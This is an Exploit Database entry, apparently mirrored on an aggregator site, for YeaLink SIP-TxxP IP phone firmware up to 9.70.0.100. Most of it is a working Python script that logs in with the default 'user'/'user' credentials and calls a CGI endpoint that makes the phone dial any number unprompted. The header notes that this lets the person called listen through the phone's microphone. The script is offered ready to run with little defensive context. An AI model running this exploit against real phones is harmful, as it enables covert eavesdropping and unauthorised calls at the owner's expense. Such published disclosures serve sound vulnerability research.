YeaLink IP Phone Firmware 9.70.0.100 – Phone Call

• Exploit Database
• 17 阅读

• 作者： b0rh
  日期： 2013-05-29
• 类别：

  • webapps
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/25811/

• # Exploit Title: [YeaLink IP Phone SIP-TxxP firmware <=9.70.0.100 phone
  call vulnerability]
  # Date: [05-28-2013]
  # Exploit Author: [b0hr (francisco<[at]>garnelo.eu)]
  # Vendor Homepage: [http://yealink.com]
  # Software Link: [
  http://yealink.com/product_list.aspx?BaseInfoCateId=147&CateId=147&ProductsCateID=147
  ]
  # Version: 9.70.0.100 and lower]
  # Tested on: [YeaLink IP Phone SIP-T20P and SIP-T26P (hardware VoIP
  phone)]
  # Vulnerability : [It's possible to make calls from using the first
  available sip account, without supervision or confirmation of the user,
  also the call receiver can listen through the phone mic .]
  
  #!/usr/bin/python
   
  import urllib2, sys
   
  print "\n YeaLink IP Phone SIP-TxxP firmware <=9.70.0.100 phone call vulnerability - b0rh (francisco<[at]>garnelo.eu) - 2013-05-28 \n"
  
  if (len(sys.argv) != 3):
  print ">> Use: " + sys.argv[0] + " <IP Phone> <phone number>"
  print ">> Ex: " + sys.argv[0] + " 127.0.0.1 123456789\n"
  exit(0)
   
  IP = sys.argv[1]
  num = sys.argv[2]
  UrlGet_params = 'http://%s/cgi-bin/ConfigManApp.com?Id=34&Command=1&Number=%s&Account=0&sid=0.724202975169738' % (IP, num)
  webU = 'user'
  webP = 'user'
  
  query = urllib2.HTTPPasswordMgrWithDefaultRealm()
  query.add_password(None, UrlGet_params, webU, webP)
  auth = urllib2.HTTPBasicAuthHandler(query)
  log = urllib2.build_opener(auth)
  
  
  urllib2.install_opener(log)
  
  queryPag = urllib2.urlopen(UrlGet_params)
  
  print "\n Call to %s form IP phone %s\n" %(num,IP)